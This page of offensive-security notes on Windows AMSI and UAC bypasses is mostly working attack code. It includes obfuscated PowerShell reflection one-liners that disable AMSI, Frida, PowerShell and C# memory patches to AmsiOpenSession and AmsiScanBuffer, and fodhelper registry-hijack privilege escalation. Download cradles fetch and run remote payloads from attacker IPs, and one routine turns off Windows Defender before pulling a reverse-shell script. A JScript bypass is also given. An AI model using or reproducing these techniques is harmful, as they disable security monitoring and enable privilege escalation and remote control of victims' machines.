AMSI & UAC Bypasses

https://amsi.fail/

https://github.com/RythmStick/AMSITrigger

Reflection to bypass AMSI

- Basic One-liners

To evade AMSI by corrupting the context structure, created by the AmsiInitialize function when AMSI.DLL is first loaded and initialiced inside the PowerShell process, with a one-liner:

$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d $c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

To use this bypass, we’ll save it to amsi.txt, host it and load it in memory:

(new-object system.net.webclient).downloadstring('http://192.168.119.120/amsi.txt') | IEX

If it doesnt work we can try this version:

S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

To evade AMSI through amsiInitFailed field, which is verified by AmsiOpenSession in the same manner as the amsiContext header, which leads to an error:

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

or

(([Ref].Assembly.gettypes() | ? {$_.Name -like "Amsi*utils"}).GetFields("NonPublic,Static") | ? {$_.Name -like "amsiInit*ailed"}).SetValue($null,$true)

- Matt Graebers Reflection method

$kTREgat=$null;$viydemv="$([cHAR]([bYte]0x53)+[ChAR](121*92/92)+[Char]([byte]0x73)+[chAR]([ByTe]0x74)+[chAR](9+92)+[CHAr](109+79-79)).$(('Mã'+'nä'+'ge'+'me'+'nt').NoRmAlizE([CHaR]([bytE]0x46)+[cHAR]([BYte]0x6f)+[cHar](114*93/93)+[CHAR](109)+[Char]([byte]0x44)) -replace [CHAr]([ByTE]0x5c)+[cHAR]([byTE]0x70)+[ChAr]([Byte]0x7b)+[cHAR](77+64-64)+[cHAr]([ByTe]0x6e)+[cHaR](125+64-64)).$(('Äutômätì'+'õn').NORMAlIzE([ChAr](70)+[CHAr]([byte]0x6f)+[char]([bytE]0x72)+[ChAr]([bYtE]0x6d)+[CHar](68)) -replace [CHAR]([bYtE]0x5c)+[cHaR](112)+[chAr]([BYTE]0x7b)+[CHaR](77)+[CHAR](110+57-57)+[chaR](125+52-52)).$([CHAR](65*27/27)+[ChAR](109)+[CHaR]([BytE]0x73)+[cHaR](101+4)+[chaR]([ByTE]0x55)+[cHaR]([BYtE]0x74)+[ChaR](105)+[ChaR](98+10)+[cHaR]([Byte]0x73))";$nlrlxtygnpyu="+('f'+'n'+'c'+'j'+'z'+'k'+'v'+'n').norMaLIZe([CHar](70+24-24)+[CHAR]([ByTe]0x6f)+[char](114)+[ChAr]([BYTe]0x6d)+[CHaR](68)) -replace [ChaR](11+81)+[ChAR](112)+[ChaR](123+23-23)+[CHaR]([Byte]0x4d)+[CHAR]([BytE]0x6e)+[CHar](42+83)";[Threading.Thread]::Sleep(1436);[Ref].Assembly.GetType($viydemv).GetField($([ChaR](97+4-4)+[CHAr](109+13-13)+[cHar]([ByTE]0x73)+[cHAr](105)+[chAr](73*25/25)+[CHaR](110*30/30)+[chAR]([bYtE]0x69)+[ChAR](116)+[char]([ByTe]0x46)+[cHAR](97)+[char](105*86/86)+[ChaR]([bYTe]0x6c)+[cHaR]([bYTE]0x65)+[char]([byTE]0x64)),"NonPublic,Static").SetValue($kTREgat,$true);

- Matt Graebers second Reflection method

$NadZSHhwH=$null;$btoqqvt="$(('Sy'+'st'+'em').NorMALizE([Char]([BYte]0x46)+[CHAR]([bytE]0x6f)+[chaR]([bytE]0x72)+[Char](109+4-4)+[CHaR](68+38-38)) -replace [chaR](10+82)+[chAr]([ByTE]0x70)+[Char]([BYTE]0x7b)+[ChAR](77*39/39)+[chaR](110*105/105)+[CHAR](125)).$(('Mãn'+'áge'+'men'+'t').normAlIZe([cHAr]([ByTe]0x46)+[cHaR](111)+[Char]([bYtE]0x72)+[CHaR]([BYTE]0x6d)+[cHaR]([BYtE]0x44)) -replace [cHaR]([BYTe]0x5c)+[chAR](112*28/28)+[chAr]([ByTE]0x7b)+[chAr](77*11/11)+[ChAr](110)+[ChaR](96+29)).$([Char]([BYTe]0x41)+[ChaR](117+36-36)+[ChAr]([byTE]0x74)+[cHAr]([Byte]0x6f)+[ChaR](109*80/80)+[cHAr](97+4-4)+[CHaR]([ByTe]0x74)+[cHAR]([ByTE]0x69)+[chAR](77+34)+[cHAr](110*104/104)).$(('Âms'+'îUt'+'îls').NOrMaLize([ChaR]([bYte]0x46)+[CHAr](111*83/83)+[cHar](114*77/77)+[cHAr](82+27)+[CHar](68+60-60)) -replace [chAr](92*54/54)+[cHar]([bYtE]0x70)+[cHAr](123*21/21)+[cHAr](29+48)+[CHar]([byTE]0x6e)+[CHAR](125*20/20))";$ff="+('híksf'+'ulxel'+'jsqdw'+'tjkvz').NoRmAliZE([CHAR](70+21-21)+[cHaR]([BYtE]0x6f)+[CHar]([bYte]0x72)+[char](109)+[CHar](68+1-1)) -replace [ChaR]([bYTE]0x5c)+[cHAr]([BYtE]0x70)+[ChAr]([bYte]0x7b)+[CHaR](77)+[char](14+96)+[cHaR]([bytE]0x7d)";[Threading.Thread]::Sleep(1158);[Runtime.InteropServices.Marshal]::("$(('WríteÎn'+'t32').NoRMAliZE([CHar]([ByTE]0x46)+[chAr](111*70/70)+[CHaR]([BYTe]0x72)+[chaR](109+41-41)+[chaR]([bytE]0x44)) -replace [chAR](92*34/34)+[ChaR]([bYTE]0x70)+[chaR]([ByTE]0x7b)+[CHAr]([bytE]0x4d)+[chAr](110*98/98)+[ChAr]([byTe]0x7d))")([Ref].Assembly.GetType($btoqqvt).GetField("$([CHaR]([BYTE]0x61)+[chAr]([BYte]0x6d)+[cHAr](11+104)+[cHAR]([bytE]0x69)+[chAR]([ByTE]0x43)+[char](111)+[CHAr](110+61-61)+[chAR]([bYte]0x74)+[CHAr](101)+[ChAR](120)+[cHar](116+107-107))",[Reflection.BindingFlags]"NonPublic,Static").GetValue($NadZSHhwH),0x4f70f40);

- Matt Graebers Reflection method with WMF5 autologging bypass

$DhtEiTqN=$null;$acgby="$(('S'+'y'+'s'+'t'+'e'+'m').nOrMALiZe([cHAR](70)+[chaR]([BYTe]0x6f)+[CHar]([BYtE]0x72)+[ChAr](109+57-57)+[CHaR](17+51)) -replace [char](92+40-40)+[ChAR](112+8-8)+[chAR]([bYTe]0x7b)+[CHaR]([BytE]0x4d)+[chAR](110)+[CHAR](125)).$([CHar](77*21/21)+[ChAR]([BytE]0x61)+[chAr]([BYte]0x6e)+[ChaR](35+62)+[CHAR](103*24/24)+[ChaR](101)+[ChAr]([bYte]0x6d)+[char](90+11)+[chAR]([bYTe]0x6e)+[CHAR]([byte]0x74)).$(('Âutó'+'mätî'+'ôn').nORmaLize([ChAR](70*26/26)+[CHAr](111*54/54)+[CHAr]([BYtE]0x72)+[chaR]([bYTe]0x6d)+[cHAR]([BYTe]0x44)) -replace [cHAR]([byTe]0x5c)+[CHar]([bYtE]0x70)+[CHar]([BYTE]0x7b)+[ChAR](77+45-45)+[chaR]([BytE]0x6e)+[CHaR]([ByTe]0x7d)).$([chAR](65+29-29)+[cHAR](109+95-95)+[CHaR](86+29)+[Char](105*37/37)+[cHAr](85*61/61)+[ChAr](53+63)+[CHaR]([byte]0x69)+[ChaR](108*22/22)+[Char]([BytE]0x73))";$jpvucvmwtaybddvxnflhwadhdmcuu="+('ìlkv'+'vsôk').NORMALize([chAR]([ByTe]0x46)+[cHar](111*96/96)+[Char]([bYte]0x72)+[cHAR](109*95/95)+[cHar]([bYte]0x44)) -replace [char](66+26)+[ChAR]([ByTe]0x70)+[chAr]([bYtE]0x7b)+[Char]([bYtE]0x4d)+[CHar]([byTE]0x6e)+[cHar]([BYTE]0x7d)";[Threading.Thread]::Sleep(915);[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType($([ChAR]([BYtE]0x53)+[cHaR]([ByTE]0x79)+[ChaR]([byte]0x73)+[chaR]([BYtE]0x74)+[ChaR](101+86-86)+[chaR]([byte]0x6d)+[CHAr]([ByTe]0x2e)+[cHaR]([bYtE]0x52)+[ChAr]([BYte]0x65)+[CHAR]([BYtE]0x66)+[cHaR]([bYTE]0x6c)+[cHaR](101)+[chAR]([byTe]0x63)+[ChAr]([bYtE]0x74)+[cHAr](105+46-46)+[CHar]([byTE]0x6f)+[CHaR]([BYTE]0x6e)+[ChAR]([bYTe]0x2e)+[CHaR](32+34)+[char]([BYtE]0x69)+[chAr]([BYte]0x6e)+[cHaR]([bYTe]0x64)+[CHAR]([bYTe]0x69)+[cHaR](110*22/22)+[chaR](103)+[CHaR](70)+[ChAr](91+17)+[chAr](97*81/81)+[cHaR]([ByTE]0x67)+[cHar]([ByTe]0x73)))).FullName), $(('S'+'y'+'s'+'t'+'e'+'m').nOrMALiZe([cHAR](70)+[chaR]([BYTe]0x6f)+[CHar]([BYtE]0x72)+[ChAr](109+57-57)+[CHaR](17+51)) -replace [char](92+40-40)+[ChAR](112+8-8)+[chAR]([bYTe]0x7b)+[CHaR]([BytE]0x4d)+[chAR](110)+[CHAR](125)).Reflection.FieldInfo]" -as [String].Assembly.GetType($([chAR](83+39-39)+[CHAr](121)+[cHaR](52+63)+[CHaR](116)+[CHAR](101*25/25)+[CHaR](109)+[chAr]([BytE]0x2e)+[CHar]([byTE]0x54)+[cHar](121+70-70)+[chaR](112)+[CHAR]([Byte]0x65)))), [Object]([Ref].Assembly.GetType($acgby)),($(('Get'+'Fíe'+'ld').NORmAliZE([chAR]([BYTe]0x46)+[CHar]([bYTE]0x6f)+[chaR](114)+[CHaR]([byte]0x6d)+[CHaR]([BytE]0x44)) -replace [CHAr]([ByTE]0x5c)+[chAr]([byTe]0x70)+[ChaR]([ByTe]0x7b)+[chaR]([Byte]0x4d)+[chAR](110)+[cHAR]([Byte]0x7d)))).Invoke($([cHAr](97*95/95)+[CHAr]([byTe]0x6d)+[ChAR]([byTE]0x73)+[CHaR]([BYtE]0x69)+[cHaR](73+61-61)+[CHAr]([Byte]0x6e)+[CHaR]([byte]0x69)+[chaR](116+81-81)+[CHAR]([bYtE]0x46)+[cHar](97+19-19)+[CHAR](105*1/1)+[cHAr]([BYTe]0x6c)+[CHAR](101)+[chAr]([BYTE]0x64)),(("NonPublic,Static") -as [String].Assembly.GetType($([ChAR]([BYtE]0x53)+[cHaR]([ByTE]0x79)+[ChaR]([byte]0x73)+[chaR]([BYtE]0x74)+[ChaR](101+86-86)+[chaR]([byte]0x6d)+[CHAr]([ByTe]0x2e)+[cHaR]([bYtE]0x52)+[ChAr]([BYte]0x65)+[CHAR]([BYtE]0x66)+[cHaR]([bYTE]0x6c)+[cHaR](101)+[chAR]([byTe]0x63)+[ChAr]([bYtE]0x74)+[cHAr](105+46-46)+[CHar]([byTE]0x6f)+[CHaR]([BYTE]0x6e)+[ChAR]([bYTe]0x2e)+[CHaR](32+34)+[char]([BYtE]0x69)+[chAr]([BYte]0x6e)+[cHaR]([bYTe]0x64)+[CHAR]([bYTe]0x69)+[cHaR](110*22/22)+[chaR](103)+[CHaR](70)+[ChAr](91+17)+[chAr](97*81/81)+[cHaR]([ByTE]0x67)+[cHar]([ByTe]0x73))))).SetValue($DhtEiTqN,$True);

AmsiOpenSession Patching

- Frida to patch AMSI

First create amsi.js:

// Attach to the AmsiOpenSession function
var baseAddress = Module.findExportByName("amsi.dll", "AmsiOpenSession");

console.log("AmsiOpenSession address: " + baseAddress);

// Function for dummying the first 4 bytes in hexadecimal format
function dumpBytes(address, numBytes) {
    var bytes = [];
    for (var i = 0; i < numBytes; i++) {
        bytes.push('0x' + Memory.readU8(address.add(i)).toString(16).padStart(2, '0'));
    }
    return bytes;
}

// Dump the first 4 bytes before modification
console.log("Antes de modificar:");
console.log(dumpBytes(baseAddress, 4));

// We modify the fourth byte to be '0xEB'.
var fourthByteAddress = baseAddress.add(3); // Nos movemos 3 bytes desde la dirección base para obtener el cuarto byte

// Set write permissions on the memory region
Memory.protect(fourthByteAddress, 1, 'rwx');

// We write the value '0xEB' in the fourth byte
Memory.writeU8(fourthByteAddress, 0xEB);

// Dump the first 4 bytes after the modification
console.log("Después de modificar:");
console.log(dumpBytes(baseAddress, 4));

Then, with frida-inject (legitimate analysis tool), patch the current powershell process:

frida-inject -n powershell.exe -s amsi.js

Then the patched powershell wont have amsi enabled.

Win32 APIs to corrupt the AMSI functions themselves

- AmsiOpenSession Bypass (powershell)

function LookupFunc {
    Param ($moduleName, $functionName)
    $assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
    Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
    $tmp = @()
    $assem.GetMethods() | ForEach-Object {
        If($_.Name -eq "GetProcAddress") {
            $tmp += $_
        }
    }
    return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName))
}

function getDelegateType {
    Param (
        [Parameter(Position = 0, Mandatory = $True)]
        [Type[]]$func,
        [Parameter(Position = 1)]
        [Type]$delType = [Void]
    )
    $type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $type.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags('Runtime, Managed')
    $type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed')
    return $type.CreateType()
}

[IntPtr]$funcAddr = LookupFunc amsi.dll AmsiOpenSession
$oldProtectionBuffer = 0
$vp = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool])))
$vp.Invoke($funcAddr, 3, 0x40, [ref]$oldProtectionBuffer)
$buf = [Byte[]](0x48, 0x31, 0xC0)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $funcAddr, 3)
$vp.Invoke($funcAddr, 3, 0x20, [ref]$oldProtectionBuffer)

- AmsiScanBuffer Bypass (C#)

We can then implement it from reflective powershell:

using System;
using System.Runtime.InteropServices;

public class AmsiBypass
{
    public static void Execute()
    {
        // Load amsi.dll and get location of AmsiScanBuffer
        var lib = LoadLibrary("amsi.dll");
        var asb = GetProcAddress(lib, "AmsiScanBuffer");

        var patch = GetPatch;

        // Set region to RWX
        _ = VirtualProtect(asb, (UIntPtr)patch.Length, 0x40, out uint oldProtect);

        // Copy patch
        Marshal.Copy(patch, 0, asb, patch.Length);

        // Restore region to RX
        _ = VirtualProtect(asb, (UIntPtr)patch.Length, oldProtect, out uint _);
    }

    static byte[] GetPatch
    {
        get
        {
            if (Is64Bit)
            {
                return new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
            }

            return new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
        }
    }

    static bool Is64Bit
    {
        get
        {
            return IntPtr.Size == 8;
        }
    }

    [DllImport("kernel32")]
    static extern IntPtr GetProcAddress(
        IntPtr hModule,
        string procName);

    [DllImport("kernel32")]
    static extern IntPtr LoadLibrary(
        string name);

    [DllImport("kernel32")]
    static extern bool VirtualProtect(
        IntPtr lpAddress,
        UIntPtr dwSize,
        uint flNewProtect,
        out uint lpflOldProtect);
}

- AmsiScanBuffer Bypass (Powershell)

$loehb = @"
using System;
using System.Runtime.InteropServices;
public class loehb {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr mmrnod, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $loehb

$mdmelan = [loehb]::LoadLibrary("$(('âm'+'sí'+'.d'+'ll').NormaliZe([ChaR](70+23-23)+[chAR]([ByTE]0x6f)+[CHar](114)+[ChAr](109)+[CHaR](68*51/51)) -replace [Char]([bYtE]0x5c)+[ChaR](112*69/69)+[cHar](123)+[CHaR]([ByTE]0x4d)+[Char](110*71/71)+[cHAR]([BYTe]0x7d))")
$ftybcz = [loehb]::GetProcAddress($mdmelan, "$(('Ä'+'m'+'s'+'í'+'S'+'c'+'ä'+'n'+'B'+'u'+'f'+'f'+'e'+'r').NORmaliZe([ChAr](13+57)+[Char](68+43)+[ChAR](114*61/61)+[CHaR](29+80)+[CHAR](68+45-45)) -replace [chAR]([bYTE]0x5c)+[cHAR](88+24)+[cHAR](123+92-92)+[CHAR]([byTE]0x4d)+[CHAr]([bYTe]0x6e)+[ChAr]([byTE]0x7d))")
$p = 0
[loehb]::VirtualProtect($ftybcz, [uint32]5, 0x40, [ref]$p)
$yjqr = "0xB8"
$pmiy = "0x57"
$saud = "0x00"
$vbcc = "0x07"
$qhbr = "0x80"
$kbvw = "0xC3"
$ndwov = [Byte[]] ($yjqr,$pmiy,$saud,$vbcc,+$qhbr,+$kbvw)
[System.Runtime.InteropServices.Marshal]::Copy($ndwov, 0, $ftybcz, 6)

Fodhelper UAC bypass including AMSI Bypass

First we host run.txt, which is a shellcode runner including one of the previous AMSI Bypasses.

New-Item -Path HKCU:\Software\Classes\mssettings\shell\open\command -Value "powershell.exe (New-ObjectSystem.Net.WebClient).DownloadString('http://192.168.119.120/run.txt') | IEX" -Force

New-ItemProperty -Path HKCU:\Software\Classes\mssettings\shell\open\command -Name DelegateExecute -PropertyType String -Force

C:\Windows\System32\fodhelper.exe

We can improve this with a script that executes a powershell encoded command that is a download cradle that executes a powershell reflection script running a shellcode and with AMSI Bypass:

Note that to prives we need to type the new function "PrivEsc".

function RegStuff {
    $cmd = "C:\Windows\Tasks\foo.exe -enc {encoded command}"
    copy C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Tasks\foo.exe
    Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force -ErrorAction SilentlyContinue
    New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
    New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
    Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $cmd -Force
}

function PrivEsc {
    Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
    Start-Sleep -s 3
    Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force -ErrorAction SilentlyContinue
}

RegStuff

We can do the same but disabling the defender:

function alt { 
    Param (    
        [String]$program = 'Powershell -WindowStyle Hidden Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend;iex (new-object net.webclient).downloadstring(''http://172.21.23.10/rev.ps1'')'
        
        #Disables win defender and calls powershell payload for additional reverse shell w/ elevation.  Note that type of payload matters! Calling a remote injector/hollower w/ ppid spoof will give you a system shell, if you want a normal one call a standard runner.
        #Powershell -WindowStyle Hidden Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend;iex (new-object net.webclient).downloadstring(''http://192.168.1.195/payload.txt'')
        
        
         
    )
    
    
    New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force
    Set-ItemProperty  "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value "" -Force

    New-Item "HKCU:\Software\Classes\.yelow\Shell\Open\command" -Force
    Set-ItemProperty "HKCU:\Software\Classes\.yelow\Shell\Open\command" -Name "(default)" -Value $program -Force

    Set-ItemProperty  "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value ".yelow" -Force
    Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

    Start-Sleep 3
    
    Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
    Remove-Item "HKCU:\Software\Classes\.yelow\" -Recurse -Force
}

Jscript AMSI Bypass

Here we will add the following AMSI Jscript bypass before the shellcode generated with DotNetToJscript:

var filesys = new ActiveXObject("Scripting.FileSystemObject");
var sh = new ActiveXObject('WScript.Shell');

try {
    if (filesys.FileExists("C:\\Windows\\Tasks\\AMSI.dll") == 0) {
        throw new Error(1, '');
    }
} catch (e) {
    filesys.CopyFile("C:\\Windows\\System32\\wscript.exe", "C:\\Windows\\Tasks\\AMSI.dll");
    sh.Exec("C:\\Windows\\Tasks\\AMSI.dll -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58} " + WScript.ScriptFullName);
    WScript.Quit(1);
}

In this case, the reverse shell launched (indicating that we bypassed AMSI) but Windows Defender detected a new process named “amsi.dll” and flagged our code. In this case, we had a working shell for a brief period of time, but it was killed as soon as Windows Defender flagged it. We can work around this by immediately migrating the process, which will keep our migrated shell alive. Alternatively, we could use a shellcode runner that performs process injection or hollowing.

PreviousMicrosoft Defender AntivirusNextAppLocker and Powershell CLM

Last updated